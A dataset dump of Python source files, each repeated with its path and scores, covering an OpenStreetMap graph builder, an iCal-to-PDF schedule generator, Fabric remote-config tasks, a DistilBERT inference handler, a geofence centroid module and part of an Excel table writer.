ox.save_load.save_graphml(G, 'city.graphml')
fullGraphDict = {}
for node in G.nodes:
fullGraphDict[node] = G.nodes[node]
with open("../ui/src/graph.json", "w") as fp:
json.dump(fullGraphDict , fp)
print('done') | prepare/5_addFootprintsToGraph.py | import osmnx as ox
import networkx as nx
import json
import shapely.wkt
from shapely.geometry import LineString
print('reading previous stage results')
with open('tmp/houseNodes.json', encoding='utf-8') as f:
houseRawNodes=json.load(f)
for house in houseRawNodes:
if type(house['geometry']) == str:
house['geometry'] = shapely.wkt.loads(house['geometry'])
if type(house['toGeometry']) == str:
house['toGeometry'] = shapely.wkt.loads(house['toGeometry'])
G = ox.save_load.load_graphml('tmp_city.graphml')
print('adding edges')
new_edges = []
for house in houseRawNodes:
new_edges.append({
"from": house['closest'],
"to": house['osmid'],
"geometry": LineString([(house['geometry'].x, house['geometry'].y), (house['toGeometry'].x, house['toGeometry'].y)]),
"key": 0,
"107413303": 0,
"name": None,
"highway": "residential",
"oneway": False,
"length": 0,
"highway": "projected_footway",
"ref": None,
"maxspeed": None,
"lanes": None,
"bridge": None,
"junction": None,
"service": None,
"tunnel": None,
"access": None,
"width": None,
})
for edge in new_edges:
G.add_edge(
edge["from"],
edge["to"],
osmid=0,
highway=edge["highway"],
oneway=edge["oneway"],
length=edge["length"],
geometry=edge["geometry"]
)
# add back edge
G.add_edge(
edge["to"],
edge["from"],
osmid=0,
highway=edge["highway"],
oneway=edge["oneway"],
length=edge["length"],
geometry=edge["geometry"]
)
print('adding nodes')
new_nodes = []
for house in houseRawNodes:
new_nodes.append({
"osmid": house['osmid'],
"geometry": house['geometry'],
"tag": house['tag'],
"name": house['name'],
"addr": house['addr'],
"highway": None,
})
for node in new_nodes:
G.add_node(
node["osmid"],
y=node["geometry"].y,
x=node["geometry"].x,
osmid=node["osmid"],
tag=node["tag"],
name=node["name"],
addr=node["addr"]
)
print('saving full graph')
ox.save_load.save_graphml(G, 'city.graphml')
fullGraphDict = {}
for node in G.nodes:
fullGraphDict[node] = G.nodes[node]
with open("../ui/src/graph.json", "w") as fp:
json.dump(fullGraphDict , fp)
print('done') | 0.109849 | 0.394959 |
import sys
import logging
import argparse
import datetime
import pytz
import numpy as np
from icalendar import Calendar
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import A4, landscape
logger = logging.getLogger(__name__)
local_tz = pytz.timezone('Europe/Stockholm') # beware of daylight saving
def utc_to_local(utc_dt):
local_dt = utc_dt.replace(tzinfo=pytz.utc).astimezone(local_tz)
return local_tz.normalize(local_dt) # .normalize might be unnecessary
def main(args=sys.argv[1:]):
"""
Read an iCal calendar file and convert it to a PDF which is ready to be handed out to students.
Note: locations should be a 3-letter code which is elaborated in the calendar description.
"""
parser = argparse.ArgumentParser()
parser.add_argument("inputfile", help="iCal file from which PDF schedule will be produced.", type=str)
parser.add_argument("-v", "--verbosity", action='count',
help="increase output verbosity",
default=0)
parsed_args = parser.parse_args(args)
if parsed_args.verbosity == 1:
logging.basicConfig(level=logging.INFO)
elif parsed_args.verbosity > 1:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig()
fn_in = parsed_args.inputfile
fn_out = fn_in.replace("ics", "pdf")
with open(fn_in, 'rb') as g:
gcal = Calendar.from_ical(g.read())
c = canvas.Canvas(fn_out, pagesize=landscape(A4))
margin = 50.0 # marin in points
xmax, ymax = np.array(landscape(A4)) - margin
xmin, ymin = np.zeros(2) + margin
dates = []
events = []
for i, _c in enumerate(gcal.walk()):
if _c.name == "VCALENDAR":
calname = _c["X-WR-CALNAME"]
caldesc = _c["X-WR-CALDESC"]
if _c.name == "VEVENT":
logger.info("")
logger.info("{}".format(_c['summary']))
dates.append(_c.decoded('dtstart'))
events.append(_c)
idxarr = np.argsort(dates)
c.setFont('Helvetica', 20)
c.drawString(xmin, ymax - 10, calname)
c.setFont('Helvetica', 6)
c.drawString(xmin + 700, ymax, "Autogenerated")
c.drawString(xmin + 700, ymax - 8, datetime.datetime.now().strftime("%m.%d.%Y-%H:%M"))
c.setFont('Helvetica', 12)
# positions
xoff_date = 0
xoff_start_time = 75
xoff_stop_time = 110
xoff_location = 150
xoff_name = 250
xoff_desc = 550
maxchar = 60 # maximum characters per line
maxchar_desc = 40 # maximum characters per line
ypos = 0
j = 0
for i, idx in enumerate(idxarr):
_c = events[idx]
_name = _c['SUMMARY']
_dt = utc_to_local(_c['DTSTART'].dt)
_start_date = _dt.strftime("%a, %d %b")
_start_time = _dt.strftime("%H:%M")
if "LOCATION" in _c:
_location = _c['LOCATION']
if "DTEND" in _c:
_dt = utc_to_local(_c['DTEND'].dt)
_stop_time = _dt.strftime("%H:%M")
else:
_stop_time = None
if "DESCRIPTION" in _c:
_description = _c['DESCRIPTION']
else:
_description = None
if i == 0:
_start_date_old = _start_date
if _start_date != _start_date_old:
c.line(xmin, ypos-2, xmax, ypos-2)
_start_date_old = _start_date
ypos = ymax - 40 - (j * 14)
if ypos < ymin: # new page and reset counter
c.showPage()
j = 0
ypos = ymax - 40 - (j * 14)
c.drawString(xmin + xoff_date, ypos, _start_date)
c.drawString(xmin + xoff_start_time, ypos, _start_time)
if _stop_time:
c.drawString(xmin + xoff_stop_time, ypos, _stop_time)
if _location:
c.drawString(xmin + xoff_location, ypos, _location[:3])
if len(_name) > maxchar:
import textwrap
lines = textwrap.wrap(_name, maxchar)
j -= 1
for line in lines:
j += 1
ypos = ymax - 40 - (j * 14)
c.drawString(xmin + xoff_name, ypos, line)
else:
c.drawString(xmin + xoff_name, ypos, _name)
if _description:
if len(_description) > maxchar_desc:
import textwrap
lines = textwrap.wrap(_description, maxchar_desc)
j -= 1
for line in lines:
j += 1
ypos = ymax - 40 - (j * 14)
c.drawString(xmin + xoff_desc, ypos, line)
else:
c.drawString(xmin + xoff_name, ypos, _description)
j += 1
j += 2 # more newlines
for line in caldesc.split("\n"):
ypos = ymax - 40 - (j * 14)
c.drawString(xmin, ypos, line)
if ypos < ymin: # new page and reset counter
c.showPage()
j = 0
ypos = ymax - 40 - (j * 14)
j += 1
c.save()
if __name__ == '__main__':
sys.exit(main(sys.argv[1:])) | icalpdf.py | import sys
import logging
import argparse
import datetime
import pytz
import numpy as np
from icalendar import Calendar
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import A4, landscape
logger = logging.getLogger(__name__)
local_tz = pytz.timezone('Europe/Stockholm') # beware of daylight saving
def utc_to_local(utc_dt):
local_dt = utc_dt.replace(tzinfo=pytz.utc).astimezone(local_tz)
return local_tz.normalize(local_dt) # .normalize might be unnecessary
def main(args=sys.argv[1:]):
"""
Read an iCal calendar file and convert it to a PDF which is ready to be handed out to students.
Note: locations should be a 3-letter code which is elaborated in the calendar description.
"""
parser = argparse.ArgumentParser()
parser.add_argument("inputfile", help="iCal file from which PDF schedule will be produced.", type=str)
parser.add_argument("-v", "--verbosity", action='count',
help="increase output verbosity",
default=0)
parsed_args = parser.parse_args(args)
if parsed_args.verbosity == 1:
logging.basicConfig(level=logging.INFO)
elif parsed_args.verbosity > 1:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig()
fn_in = parsed_args.inputfile
fn_out = fn_in.replace("ics", "pdf")
with open(fn_in, 'rb') as g:
gcal = Calendar.from_ical(g.read())
c = canvas.Canvas(fn_out, pagesize=landscape(A4))
margin = 50.0 # marin in points
xmax, ymax = np.array(landscape(A4)) - margin
xmin, ymin = np.zeros(2) + margin
dates = []
events = []
for i, _c in enumerate(gcal.walk()):
if _c.name == "VCALENDAR":
calname = _c["X-WR-CALNAME"]
caldesc = _c["X-WR-CALDESC"]
if _c.name == "VEVENT":
logger.info("")
logger.info("{}".format(_c['summary']))
dates.append(_c.decoded('dtstart'))
events.append(_c)
idxarr = np.argsort(dates)
c.setFont('Helvetica', 20)
c.drawString(xmin, ymax - 10, calname)
c.setFont('Helvetica', 6)
c.drawString(xmin + 700, ymax, "Autogenerated")
c.drawString(xmin + 700, ymax - 8, datetime.datetime.now().strftime("%m.%d.%Y-%H:%M"))
c.setFont('Helvetica', 12)
# positions
xoff_date = 0
xoff_start_time = 75
xoff_stop_time = 110
xoff_location = 150
xoff_name = 250
xoff_desc = 550
maxchar = 60 # maximum characters per line
maxchar_desc = 40 # maximum characters per line
ypos = 0
j = 0
for i, idx in enumerate(idxarr):
_c = events[idx]
_name = _c['SUMMARY']
_dt = utc_to_local(_c['DTSTART'].dt)
_start_date = _dt.strftime("%a, %d %b")
_start_time = _dt.strftime("%H:%M")
if "LOCATION" in _c:
_location = _c['LOCATION']
if "DTEND" in _c:
_dt = utc_to_local(_c['DTEND'].dt)
_stop_time = _dt.strftime("%H:%M")
else:
_stop_time = None
if "DESCRIPTION" in _c:
_description = _c['DESCRIPTION']
else:
_description = None
if i == 0:
_start_date_old = _start_date
if _start_date != _start_date_old:
c.line(xmin, ypos-2, xmax, ypos-2)
_start_date_old = _start_date
ypos = ymax - 40 - (j * 14)
if ypos < ymin: # new page and reset counter
c.showPage()
j = 0
ypos = ymax - 40 - (j * 14)
c.drawString(xmin + xoff_date, ypos, _start_date)
c.drawString(xmin + xoff_start_time, ypos, _start_time)
if _stop_time:
c.drawString(xmin + xoff_stop_time, ypos, _stop_time)
if _location:
c.drawString(xmin + xoff_location, ypos, _location[:3])
if len(_name) > maxchar:
import textwrap
lines = textwrap.wrap(_name, maxchar)
j -= 1
for line in lines:
j += 1
ypos = ymax - 40 - (j * 14)
c.drawString(xmin + xoff_name, ypos, line)
else:
c.drawString(xmin + xoff_name, ypos, _name)
if _description:
if len(_description) > maxchar_desc:
import textwrap
lines = textwrap.wrap(_description, maxchar_desc)
j -= 1
for line in lines:
j += 1
ypos = ymax - 40 - (j * 14)
c.drawString(xmin + xoff_desc, ypos, line)
else:
c.drawString(xmin + xoff_name, ypos, _description)
j += 1
j += 2 # more newlines
for line in caldesc.split("\n"):
ypos = ymax - 40 - (j * 14)
c.drawString(xmin, ypos, line)
if ypos < ymin: # new page and reset counter
c.showPage()
j = 0
ypos = ymax - 40 - (j * 14)
j += 1
c.save()
if __name__ == '__main__':
sys.exit(main(sys.argv[1:])) | 0.191479 | 0.246947 |
from unipath import Path
from fabric.api import task, run, env, require, settings, hide, fastprint, get, put, prompt
from fabric.contrib.files import append, sed
from deploy import restart
@task(default=True)
def list():
"""
List remote configurations.
"""
require('PROJECT')
fastprint(run('cat %(settings)s' % env.PROJECT, quiet=True))
@task
def set(option, value=None):
"""
Update or create option line from remote settings.ini
fab production config.set:DEBUG,False
If value is omitted, a prompt will ask for it. This helps avoid
problems settings values with $ and alike.
"""
if value is None:
value = prompt('Value: ')
option = option.upper()
after = '%s = %s' % (option, value)
remove(option, refresh=False) # remove option if exists.
append(env.PROJECT.settings, after)
# sanity check
assert contains(env.PROJECT.settings, after), 'Config not found: "%s"' % after
restart()
@task
def remove(option, refresh=True):
"""
Remove option line from remote settings.ini
"""
option = option.lower()
before = '^%s\s+?=\s+?.*' % option
after = ''
if contains(env.PROJECT.settings, before, use_re=True):
sed(env.PROJECT.settings, before, after, backup='', flags='I')
run(r"tr -s '\n' < %(settings)s > %(settings)s.new && mv %(settings)s{.new,}" % env.PROJECT)
# sanity check
assert not contains(env.PROJECT.settings, '%s.*' % option), 'Config found: "%s"' % option
if refresh:
restart()
@task
def download():
"""
Download remote settings.ini.
"""
get(env.PROJECT.settings, Path(env.lcwd, Path(env.PROJECT.settings).name))
@task
def upload(config_file):
"""
Upload a config file to replace remote settings.ini.
"""
put(config_file, env.PROJECT.share)
@task()
def add_user_to_htpasswd(username):
"""
Add username and password to the .htpasswd config file.
"""
require('PROJECT')
filepath = '%(share)s/.htpasswd' % env.PROJECT
run('touch %s' % filepath)
run('htpasswd %s %s' % (filepath, username))
def contains(filename, text, use_re=False):
'''
Check if a line exists in a file.
'''
flag = '-E -i' if use_re else '-Fx'
with settings(hide('everything'), warn_only=True):
cmd = "grep %s '%s' %s" % (flag, text, filename)
return run(cmd).succeeded | jetpack/config.py | from unipath import Path
from fabric.api import task, run, env, require, settings, hide, fastprint, get, put, prompt
from fabric.contrib.files import append, sed
from deploy import restart
@task(default=True)
def list():
"""
List remote configurations.
"""
require('PROJECT')
fastprint(run('cat %(settings)s' % env.PROJECT, quiet=True))
@task
def set(option, value=None):
"""
Update or create option line from remote settings.ini
fab production config.set:DEBUG,False
If value is omitted, a prompt will ask for it. This helps avoid
problems settings values with $ and alike.
"""
if value is None:
value = prompt('Value: ')
option = option.upper()
after = '%s = %s' % (option, value)
remove(option, refresh=False) # remove option if exists.
append(env.PROJECT.settings, after)
# sanity check
assert contains(env.PROJECT.settings, after), 'Config not found: "%s"' % after
restart()
@task
def remove(option, refresh=True):
"""
Remove option line from remote settings.ini
"""
option = option.lower()
before = '^%s\s+?=\s+?.*' % option
after = ''
if contains(env.PROJECT.settings, before, use_re=True):
sed(env.PROJECT.settings, before, after, backup='', flags='I')
run(r"tr -s '\n' < %(settings)s > %(settings)s.new && mv %(settings)s{.new,}" % env.PROJECT)
# sanity check
assert not contains(env.PROJECT.settings, '%s.*' % option), 'Config found: "%s"' % option
if refresh:
restart()
@task
def download():
"""
Download remote settings.ini.
"""
get(env.PROJECT.settings, Path(env.lcwd, Path(env.PROJECT.settings).name))
@task
def upload(config_file):
"""
Upload a config file to replace remote settings.ini.
"""
put(config_file, env.PROJECT.share)
@task()
def add_user_to_htpasswd(username):
"""
Add username and password to the .htpasswd config file.
"""
require('PROJECT')
filepath = '%(share)s/.htpasswd' % env.PROJECT
run('touch %s' % filepath)
run('htpasswd %s %s' % (filepath, username))
def contains(filename, text, use_re=False):
'''
Check if a line exists in a file.
'''
flag = '-E -i' if use_re else '-Fx'
with settings(hide('everything'), warn_only=True):
cmd = "grep %s '%s' %s" % (flag, text, filename)
return run(cmd).succeeded | 0.471953 | 0.207395 |
import json
import tensorflow as tf
from transformers import DistilBertTokenizer
from datetime import datetime
review_body_column_idx_tsv = 13
classes=[1, 2, 3, 4, 5]
max_seq_length=128
tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-uncased')
def input_handler(data, context):
start_time = datetime.utcnow()
print('input_handler() START: ' + start_time.strftime("%m/%d/%Y, %H:%M:%S"))
transformed_instances = []
for instance in data:
data_str = instance.decode('utf-8')
data_str_split = data_str.split('\t')
# print(len(data_str_split))
if (len(data_str_split) >= review_body_column_idx_tsv):
print(data_str_split[review_body_column_idx_tsv])
text_input = data_str_split[review_body_column_idx_tsv]
tokens = tokenizer.tokenize(text_input)
encode_plus_tokens = tokenizer.encode_plus(text_input,
pad_to_max_length=True,
max_length=max_seq_length)
# Convert the text-based tokens to ids from the pre-trained BERT vocabulary
input_ids = encode_plus_tokens['input_ids']
# Specifies which tokens BERT should pay attention to (0 or 1)
input_mask = encode_plus_tokens['attention_mask']
# Segment Ids are always 0 for single-sequence tasks (or 1 if two-sequence tasks)
segment_ids = [0] * max_seq_length
transformed_instance = {
"input_ids": input_ids,
"input_mask": input_mask,
"segment_ids": segment_ids
}
transformed_instances.append(transformed_instance)
transformed_data = {"instances": transformed_instances}
end_time = datetime.utcnow()
print('input_handler() END: ' + end_time.strftime("%m/%d/%Y, %H:%M:%S"))
print('input_handler() TOTAL TIME: ' + str(end_time - start_time))
return json.dumps(transformed_data)
def output_handler(response, context):
start_time = datetime.utcnow()
print('output_handler() START: ' + start_time.strftime("%m/%d/%Y, %H:%M:%S"))
response_json = response.json()
log_probabilities = response_json["predictions"]
predicted_classes = []
for log_probability in log_probabilities:
softmax = tf.nn.softmax(log_probability)
predicted_class_idx = tf.argmax(softmax, axis=-1, output_type=tf.int32)
predicted_class = classes[predicted_class_idx]
predicted_classes.append(predicted_class)
predicted_classes_json = json.dumps(predicted_classes)
print(predicted_classes_json)
response_content_type = context.accept_header
end_time = datetime.utcnow()
print('output_handler() END: ' + end_time.strftime("%m/%d/%Y, %H:%M:%S"))
print('output_handler() TOTAL TIME: ' + str(end_time - start_time))
return predicted_classes_json, response_content_type | 09_deploy/wip/src_batch_tsv/inference.py | import json
import tensorflow as tf
from transformers import DistilBertTokenizer
from datetime import datetime
review_body_column_idx_tsv = 13
classes=[1, 2, 3, 4, 5]
max_seq_length=128
tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-uncased')
def input_handler(data, context):
start_time = datetime.utcnow()
print('input_handler() START: ' + start_time.strftime("%m/%d/%Y, %H:%M:%S"))
transformed_instances = []
for instance in data:
data_str = instance.decode('utf-8')
data_str_split = data_str.split('\t')
# print(len(data_str_split))
if (len(data_str_split) >= review_body_column_idx_tsv):
print(data_str_split[review_body_column_idx_tsv])
text_input = data_str_split[review_body_column_idx_tsv]
tokens = tokenizer.tokenize(text_input)
encode_plus_tokens = tokenizer.encode_plus(text_input,
pad_to_max_length=True,
max_length=max_seq_length)
# Convert the text-based tokens to ids from the pre-trained BERT vocabulary
input_ids = encode_plus_tokens['input_ids']
# Specifies which tokens BERT should pay attention to (0 or 1)
input_mask = encode_plus_tokens['attention_mask']
# Segment Ids are always 0 for single-sequence tasks (or 1 if two-sequence tasks)
segment_ids = [0] * max_seq_length
transformed_instance = {
"input_ids": input_ids,
"input_mask": input_mask,
"segment_ids": segment_ids
}
transformed_instances.append(transformed_instance)
transformed_data = {"instances": transformed_instances}
end_time = datetime.utcnow()
print('input_handler() END: ' + end_time.strftime("%m/%d/%Y, %H:%M:%S"))
print('input_handler() TOTAL TIME: ' + str(end_time - start_time))
return json.dumps(transformed_data)
def output_handler(response, context):
start_time = datetime.utcnow()
print('output_handler() START: ' + start_time.strftime("%m/%d/%Y, %H:%M:%S"))
response_json = response.json()
log_probabilities = response_json["predictions"]
predicted_classes = []
for log_probability in log_probabilities:
softmax = tf.nn.softmax(log_probability)
predicted_class_idx = tf.argmax(softmax, axis=-1, output_type=tf.int32)
predicted_class = classes[predicted_class_idx]
predicted_classes.append(predicted_class)
predicted_classes_json = json.dumps(predicted_classes)
print(predicted_classes_json)
response_content_type = context.accept_header
end_time = datetime.utcnow()
print('output_handler() END: ' + end_time.strftime("%m/%d/%Y, %H:%M:%S"))
print('output_handler() TOTAL TIME: ' + str(end_time - start_time))
return predicted_classes_json, response_content_type | 0.37399 | 0.180071 |
import json
import math
from google.appengine.api import search
"""
Limitations:
1. Providers can only enter a single territory whose set of points does not result in a radius larger than 250 m. So providers need to enter their territories in a piecemeal fashion.
2. When searching for a latitude and longitude we return all territories whose centre of operations ( as defined by the centroid in the polygon of the territory corners ), is within the maximum radius of a territory. So this means that the territories so returned, are not guaranteed to intersect with the given point, tho they are guaranteed to be within ( or more strictly, to have their centres within ) MAX_TERRITORY_RADIUS of the given point.
"""
import graham_scan
MAX_TERRITORY_RADIUS_M = 250
def computeGeoPtCentroidFromGeoPtCorners( geopt_corners ):
planars = convert_geopoints_to_planar( geopt_corners )
hull = compute_graham_scan( planars )
centroid = compute_centroid( hull )
return convertGoogleBingToWGS84( centroid )
def convertWGS84ToGoogleBing( geopt ):
"""
This is taken from here: https://alastaira.wordpress.com/2011/01/23/the-google-maps-bing-maps-spherical-mercator-projection/
We use it to convert between co-ordinate systems, so we can use the x, y system ( planar projection ), to compute centroids.
"""
lat, lon = geopt.latitude, geopt.longitude
x = lon * 20037508.34 / 180
y = math.log(math.tan((90 + lat) * math.pi / 360)) / (math.pi / 180)
y = y * 20037508.34 / 180
return [ x, y ]
def convertGoogleBingToWGS84( xy ):
"""
This is taken from here: https://alastaira.wordpress.com/2011/01/23/the-google-maps-bing-maps-spherical-mercator-projection/
We use it to convert between co-ordinate systems, so we can use the x, y system ( planar projection ), to compute centroids.
We convert back to lat long to get our GeoPoints.
"""
x, y = xy[ 0 ], xy[ 1 ]
lon = (x / 20037508.34) * 180
lat = (y / 20037508.34) * 180
lat = 180/math.pi * (2 * math.atan(math.exp(lat * math.pi / 180)) - math.pi / 2)
return search.GeoPoint( lat, lon )
def convert_geopoints_to_planar( geopt_corners ):
return [ convertWGS84ToGoogleBing( p ) for p in geopt_corners ]
def convert_planars_to_geopoints( planars ):
return [ convertGoogleBingToWGS84( p ) for p in planars ]
def compute_graham_scan( planars ):
"""
Attempt to clean the data,
and simplify it to an approximate shape
by returning the list of corners
corresponding to the convex hull of the
given points.
It attempts this using the Graham Scan
"""
return graham_scan.convex_hull( planars )
def compute_area( planars ):
"""
Compute the polygon area, using the Shoelace Formula
We remove the absolute value to allow the signed area to occur.
Tho this will likely never be the case since our points
are ordered in CCW direction.
Taken from here: http://stackoverflow.com/a/24468019
"""
n = len(planars) # of planar coordinates
area = 0.0
for i in range(n):
j = (i + 1) % n
area += planars[i][0] * planars[j][1]
area -= planars[j][0] * planars[i][1]
area = area / 2.0
return area
def compute_centroid( planars ):
"""
Use the centroid formula to compute the centroid
of the polygon defined by these planar co-ordinate pairs.
Taken from here: http://stackoverflow.com/a/14115494
Additional notes:
We make no assumptions as to the cleanness of the points given. So we attempt to clean the data by finding the convex hull of the points using a Graham Scan O ( n log n ), this eliminates points inside the hull.
We then use the centroid formula for a polygon which also requires computing the signed area, to compute the centroid.
This causes a number of approximations. Concave features of the territory are lost, and as much as possible the set of points becomes closer in area to a circle. This is because the convex hull of a set of points the same shape obtained as if you were to stretch a rubber band around all the points and then let it tighten over them. The good point about this approximation is that there is never any point inside the territory which will be outside of our circle. However, there are points inside the circle which are not in the territory. The consequence is we will never fail to retrieve a territory given a point. Tho we will also retrieve territories that do not directly intersect the point but which are neighbours to it. This in itself is useful. And we can rank the territories returned by the distance of their centroid to the point.
This guarantees scalability and fast query speed and straightforward implementation. The cost of this method is accuracy as described above. It seems a reasonable cost, especially considering that retrieving neighbouring territories is also likely useful. A second important cost is that all territories input by providers must be less than the maximum radius. This radius determines the looseness of the groups. The smaller the radius, the tighter the groups, the larger the radius, the looser the groups returned in a query of a given point. The smaller it is, the tighter the groups of results obtained. Yet it is also a trade off, as the larger it is, the larger the territories that can be input. A workable choice can be decided by balancing these two considerations given knowledge of the real world uses, requirements and nature of the territory database.
"""
# compute centroid
area = compute_area(planars)
imax = len(planars) - 1
cx = 0.0
cy = 0.0
for i in range(0,imax):
cx += (planars[i][0] + planars[i+1][0]) * ((planars[i][0] * planars[i+1][1]) - (planars[i+1][0] * planars[i][1]))
cy += (planars[i][1] + planars[i+1][1]) * ((planars[i][0] * planars[i+1][1]) - (planars[i+1][0] * planars[i][1]))
cx += (planars[imax][0] + planars[0][0]) * ((planars[imax][0] * planars[0][1]) - (planars[0][0] * planars[imax][1]))
cy += (planars[imax][1] + planars[0][1]) * ((planars[imax][0] * planars[0][1]) - (planars[0][0] * planars[imax][1]))
cx /= (area * 6.0)
cy /= (area * 6.0)
return [ cx, cy ]
def create_geojson( props_dict, geopt_corners ):
return json.dumps( {
"type" : "Feature",
"geometry" : {
"type": "Polygon",
"coordinates": [ [ p.latitude, p.longitude ] for p in geopt_corners ]
},
"properties" : props_dict
} ) | api/geofencesearch.py | import json
import math
from google.appengine.api import search
"""
Limitations:
1. Providers can only enter a single territory whose set of points does not result in a radius larger than 250 m. So providers need to enter their territories in a piecemeal fashion.
2. When searching for a latitude and longitude we return all territories whose centre of operations ( as defined by the centroid in the polygon of the territory corners ), is within the maximum radius of a territory. So this means that the territories so returned, are not guaranteed to intersect with the given point, tho they are guaranteed to be within ( or more strictly, to have their centres within ) MAX_TERRITORY_RADIUS of the given point.
"""
import graham_scan
MAX_TERRITORY_RADIUS_M = 250
def computeGeoPtCentroidFromGeoPtCorners( geopt_corners ):
planars = convert_geopoints_to_planar( geopt_corners )
hull = compute_graham_scan( planars )
centroid = compute_centroid( hull )
return convertGoogleBingToWGS84( centroid )
def convertWGS84ToGoogleBing( geopt ):
"""
This is taken from here: https://alastaira.wordpress.com/2011/01/23/the-google-maps-bing-maps-spherical-mercator-projection/
We use it to convert between co-ordinate systems, so we can use the x, y system ( planar projection ), to compute centroids.
"""
lat, lon = geopt.latitude, geopt.longitude
x = lon * 20037508.34 / 180
y = math.log(math.tan((90 + lat) * math.pi / 360)) / (math.pi / 180)
y = y * 20037508.34 / 180
return [ x, y ]
def convertGoogleBingToWGS84( xy ):
"""
This is taken from here: https://alastaira.wordpress.com/2011/01/23/the-google-maps-bing-maps-spherical-mercator-projection/
We use it to convert between co-ordinate systems, so we can use the x, y system ( planar projection ), to compute centroids.
We convert back to lat long to get our GeoPoints.
"""
x, y = xy[ 0 ], xy[ 1 ]
lon = (x / 20037508.34) * 180
lat = (y / 20037508.34) * 180
lat = 180/math.pi * (2 * math.atan(math.exp(lat * math.pi / 180)) - math.pi / 2)
return search.GeoPoint( lat, lon )
def convert_geopoints_to_planar( geopt_corners ):
return [ convertWGS84ToGoogleBing( p ) for p in geopt_corners ]
def convert_planars_to_geopoints( planars ):
return [ convertGoogleBingToWGS84( p ) for p in planars ]
def compute_graham_scan( planars ):
"""
Attempt to clean the data,
and simplify it to an approximate shape
by returning the list of corners
corresponding to the convex hull of the
given points.
It attempts this using the Graham Scan
"""
return graham_scan.convex_hull( planars )
def compute_area( planars ):
"""
Compute the polygon area, using the Shoelace Formula
We remove the absolute value to allow the signed area to occur.
Tho this will likely never be the case since our points
are ordered in CCW direction.
Taken from here: http://stackoverflow.com/a/24468019
"""
n = len(planars) # of planar coordinates
area = 0.0
for i in range(n):
j = (i + 1) % n
area += planars[i][0] * planars[j][1]
area -= planars[j][0] * planars[i][1]
area = area / 2.0
return area
def compute_centroid( planars ):
"""
Use the centroid formula to compute the centroid
of the polygon defined by these planar co-ordinate pairs.
Taken from here: http://stackoverflow.com/a/14115494
Additional notes:
We make no assumptions as to the cleanness of the points given. So we attempt to clean the data by finding the convex hull of the points using a Graham Scan O ( n log n ), this eliminates points inside the hull.
We then use the centroid formula for a polygon which also requires computing the signed area, to compute the centroid.
This causes a number of approximations. Concave features of the territory are lost, and as much as possible the set of points becomes closer in area to a circle. This is because the convex hull of a set of points the same shape obtained as if you were to stretch a rubber band around all the points and then let it tighten over them. The good point about this approximation is that there is never any point inside the territory which will be outside of our circle. However, there are points inside the circle which are not in the territory. The consequence is we will never fail to retrieve a territory given a point. Tho we will also retrieve territories that do not directly intersect the point but which are neighbours to it. This in itself is useful. And we can rank the territories returned by the distance of their centroid to the point.
This guarantees scalability and fast query speed and straightforward implementation. The cost of this method is accuracy as described above. It seems a reasonable cost, especially considering that retrieving neighbouring territories is also likely useful. A second important cost is that all territories input by providers must be less than the maximum radius. This radius determines the looseness of the groups. The smaller the radius, the tighter the groups, the larger the radius, the looser the groups returned in a query of a given point. The smaller it is, the tighter the groups of results obtained. Yet it is also a trade off, as the larger it is, the larger the territories that can be input. A workable choice can be decided by balancing these two considerations given knowledge of the real world uses, requirements and nature of the territory database.
"""
# compute centroid
area = compute_area(planars)
imax = len(planars) - 1
cx = 0.0
cy = 0.0
for i in range(0,imax):
cx += (planars[i][0] + planars[i+1][0]) * ((planars[i][0] * planars[i+1][1]) - (planars[i+1][0] * planars[i][1]))
cy += (planars[i][1] + planars[i+1][1]) * ((planars[i][0] * planars[i+1][1]) - (planars[i+1][0] * planars[i][1]))
cx += (planars[imax][0] + planars[0][0]) * ((planars[imax][0] * planars[0][1]) - (planars[0][0] * planars[imax][1]))
cy += (planars[imax][1] + planars[0][1]) * ((planars[imax][0] * planars[0][1]) - (planars[0][0] * planars[imax][1]))
cx /= (area * 6.0)
cy /= (area * 6.0)
return [ cx, cy ]
def create_geojson( props_dict, geopt_corners ):
return json.dumps( {
"type" : "Feature",
"geometry" : {
"type": "Polygon",
"coordinates": [ [ p.latitude, p.longitude ] for p in geopt_corners ]
},
"properties" : props_dict
} ) | 0.651244 | 0.819026 |
import abc
import copy
import warnings
from typing import Any, Dict, Optional, cast # noqa
import dataproperty
import typepy
from dataproperty import DataProperty
from tabledata import TableData
from typepy import Integer
from .._common import import_error_msg_template
from ._excel_workbook import ExcelWorkbookInterface, ExcelWorkbookXls, ExcelWorkbookXlsx
from ._interface import AbstractBinaryTableWriter
class ExcelTableWriter(AbstractBinaryTableWriter, metaclass=abc.ABCMeta):
"""
An abstract class of a table writer for Excel file format.
"""
FORMAT_NAME = "excel"
@property
def format_name(self) -> str:
return self.FORMAT_NAME
@property
def workbook(self) -> Optional[ExcelWorkbookInterface]:
return self._workbook
def __init__(self, **kwargs) -> None:
super().__init__(**kwargs)
self._workbook = None # type: Optional[ExcelWorkbookInterface]
self._dp_extractor.type_value_map = {
typepy.Typecode.INFINITY: "Inf",
typepy.Typecode.NAN: "NaN",
}
self._first_header_row = 0
self._last_header_row = self.first_header_row
self._first_data_row = self.last_header_row + 1
self._first_data_col = 0
self._last_data_row = None # type: Optional[int]
self._last_data_col = None # type: Optional[int]
self._current_data_row = self._first_data_row
self._quoting_flags = copy.deepcopy(dataproperty.NOT_QUOTING_FLAGS)
self._quoting_flags[typepy.Typecode.DATETIME] = True
@property
def first_header_row(self) -> int:
"""
:return: Index of the first row of the header.
:rtype: int
.. note:: |excel_attr|
"""
return self._first_header_row
@property
def last_header_row(self) -> int:
"""
:return: Index of the last row of the header.
:rtype: int
.. note:: |excel_attr|
"""
return self._last_header_row
@property
def first_data_row(self) -> int:
"""
:return: Index of the first row of the data (table body).
:rtype: int
.. note:: |excel_attr|
"""
return self._first_data_row
@property
def last_data_row(self) -> Optional[int]:
"""
:return: Index of the last row of the data (table body).
:rtype: int
.. note:: |excel_attr|
"""
return self._last_data_row
@property
def first_data_col(self) -> int:
"""
:return: Index of the first column of the table.
:rtype: int
.. note:: |excel_attr|
"""
return self._first_data_col
@property
def last_data_col(self) -> Optional[int]:
"""
:return: Index of the last column of the table.
:rtype: int
.. note:: |excel_attr|
"""
return self._last_data_col
def is_opened(self) -> bool:
return self.workbook is not None
def open(self, file_path: str) -> None:
"""
Open an Excel workbook file.
:param str file_path: Excel workbook file path to open.
"""
